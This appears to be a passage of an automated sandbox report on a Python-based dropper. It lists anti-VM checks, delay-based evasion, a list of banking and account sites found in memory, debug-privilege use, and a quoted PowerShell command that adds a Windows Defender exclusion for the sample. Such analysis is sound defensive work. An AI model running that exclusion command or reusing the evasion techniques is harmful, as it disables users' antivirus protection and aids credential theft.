              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeAPI coverage: 1.3 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996Thread sleep count: 455 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996Thread sleep count: 4899 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5672Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8080Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004Thread sleep count: 4440 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6784Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004Thread sleep count: 353 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8088Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8012Thread sleep count: 4550 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7432Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8012Thread sleep count: 258 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8104Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8268Thread sleep count: 1301 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8512Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8412Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8836Thread sleep count: 3420 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8864Thread sleep time: -8301034833169293s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8824Thread sleep count: 1705 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8852Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3236Thread sleep count: 5989 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3236Thread sleep count: 1029 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2984Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2524Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7788Thread sleep count: 3685 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7632Thread sleep count: 1727 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4052Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3576Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8432Thread sleep count: 2743 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8740Thread sleep count: 1273 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8704Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8728Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9032Thread sleep count: 3192 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9028Thread sleep count: 809 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9068Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8992Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B110842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF7B110842C
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B10F8AF0 FindFirstFileExW,FindClose,0_2_00007FF7B10F8AF0
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B11124C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7B11124C4
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B110842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF7B110842C
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2D46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,72_2_00007FF71D2D46EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D3188E0 FindFirstFileExA,72_2_00007FF71D3188E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2CE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,72_2_00007FF71D2CE21C
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\htmlJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\cssJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\imagesJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bgJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_localesJump to behavior
              Source: getmac.exe, 0000002B.00000003.1439440681.000001ABF5664000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000002.1440054173.000001ABF5673000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
              Source: getmac.exe, 0000002B.00000003.1439440681.000001ABF5664000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V|
              Source: getmac.exe, 0000002B.00000003.1439440681.000001ABF5664000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000002.1440054173.000001ABF5673000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1457473239.0000016196D0F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1434396229.0000016196D0F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1424053605.0000016196D08000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1764753885.0000016196C5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWa
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc
              Source: getmac.exe, 0000002B.00000003.1439440681.000001ABF5664000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000002.1440054173.000001ABF5673000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage"m
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser
              Source: getmac.exe, 0000002B.00000003.1439440681.000001ABF5664000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000003.1439025716.000001ABF5695000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000002.1440054173.000001ABF5697000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000003.1438552704.000001ABF568F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765770176.00000161971E8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1766840193.0000016197572000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1457822695.000001619710E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1439779378.000001619710E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1431426826.00000161971E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
              Source: rar.exe, 00000048.00000002.1644927829.000001F5A5EEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\6
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
              Source: getmac.exe, 0000002B.00000003.1439025716.000001ABF5695000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000002.1440054173.000001ABF5697000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000003.1438552704.000001ABF568F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
              Source: getmac.exe, 0000002B.00000003.1439440681.000001ABF5664000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000002.1440054173.000001ABF5664000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\Linkageroute
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
              Source: getmac.exe, 0000002B.00000003.1439440681.000001ABF5664000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000002.1440054173.000001ABF5673000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAWRoot%\system32\dr+
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
              Source: getmac.exe, 0000002B.00000003.1439440681.000001ABF5664000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000002.1440054173.000001ABF5664000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000003.1439025716.000001ABF5695000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000002.1440054173.000001ABF5697000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000003.1438552704.000001ABF568F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B110B1B8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7B110B1B8
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B11140D0 GetProcessHeap,0_2_00007FF7B11140D0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B110B1B8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7B110B1B8
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B10FBE20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7B10FBE20
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B10FC6AC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7B10FC6AC
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B10FC88C SetUnhandledExceptionFilter,0_2_00007FF7B10FC88C
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 2_2_00007FF8E751B970 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E751B970
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 2_2_00007FF8E7553BB0 IsProcessorFeaturePresent,00007FF8F9D619C0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FF8F9D619C0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E7553BB0
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D314C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,72_2_00007FF71D314C10
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D30A66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,72_2_00007FF71D30A66C
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D30B6D8 SetUnhandledExceptionFilter,72_2_00007FF71D30B6D8
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D30B52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,72_2_00007FF71D30B52C

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'"
